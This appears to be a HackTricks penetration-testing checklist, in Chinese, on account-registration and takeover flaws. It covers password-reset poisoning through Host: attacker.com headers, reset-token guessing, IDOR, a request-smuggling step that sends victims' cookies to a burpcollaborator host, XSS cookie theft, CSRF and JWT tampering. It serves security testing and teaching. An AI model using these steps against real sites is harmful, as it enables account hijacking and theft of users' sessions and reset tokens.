Registration & Takeover Vulnerabilities
Last updated
Last updated
学习与实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)
尝试使用现有用户名生成
检查不同的电子邮件:
大写字母
+1@
在电子邮件中添加一些点
电子邮件名称中的特殊字符 (%00, %09, %20)
在电子邮件后放置黑色字符:test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
检查您是否可以确定用户名是否已在应用程序中注册。
创建用户时检查密码策略(检查您是否可以使用弱密码)。 在这种情况下,您可以尝试暴力破解凭据。
查看此页面以了解如何通过 SQL 注入 在注册表单中尝试账户接管或提取信息。
注册后尝试更改电子邮件,并检查此更改是否得到正确验证,或是否可以更改为任意电子邮件。
检查您是否可以使用 一次性电子邮件
长 密码 (>200) 导致 DoS
检查账户创建的速率限制
使用 username@burp_collab.net 并分析 回调
请求将密码重置发送到您的电子邮件地址
点击密码重置链接
不要更改密码
点击任何第三方网站(例如:Facebook,Twitter)
在 Burp Suite 代理中拦截请求
检查 referer 头是否泄露密码重置令牌。
在 Burp Suite 中拦截密码重置请求
在 Burp Suite 中添加或编辑以下头部:Host: attacker.com
, X-Forwarded-Host: attacker.com
转发带有修改头部的请求
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
查找基于 host 头 的密码重置 URL,例如:https://attacker.com/reset-password.php?token=TOKEN
攻击者必须使用他们的账户登录并进入更改密码功能。
启动Burp Suite并拦截请求
将其发送到重发器选项卡并编辑参数:用户ID/电子邮件
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
密码重置令牌应该是随机生成并且每次都是唯一的。 尝试确定令牌是否过期或是否总是相同,在某些情况下,生成算法较弱并且可以被猜测。以下变量可能被算法使用。
时间戳
用户ID
用户的电子邮件
名字和姓氏
出生日期
加密
仅数字
小令牌序列(字符在[A-Z,a-z,0-9]之间)
令牌重用
令牌过期日期
使用API/UI触发特定电子邮件的密码重置请求,例如:test@mail.com
检查服务器响应并查看resetToken
然后在URL中使用令牌,例如https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
使用与受害者用户名相同的用户名在系统中注册,但在用户名前后插入空格。例如:"admin "
使用您的恶意用户名请求密码重置。
使用发送到您电子邮件的令牌重置受害者密码。
使用新密码连接到受害者账户。
平台CTFd对该攻击存在漏洞。 见:CVE-2020-7245
在应用程序或子域中找到XSS,如果cookie的作用域为父域:*.domain.com
泄露当前会话cookie
使用cookie作为用户进行身份验证
1. 使用smuggler检测HTTP请求走私的类型(CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. 构造一个请求,该请求将用以下数据覆盖POST / HTTP/1.1
:
GET http://something.burpcollaborator.net HTTP/1.1 X:
,目的是将受害者重定向到burpcollab并窃取他们的cookie
3. 最终请求可能看起来像以下内容
Hackerone 报告利用此漏洞 * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
创建 CSRF 的有效载荷,例如:“用于密码更改的自动提交 HTML 表单”
发送有效载荷
JSON Web Token 可能用于验证用户。
使用另一个用户 ID / 电子邮件编辑 JWT
检查弱 JWT 签名
学习和实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)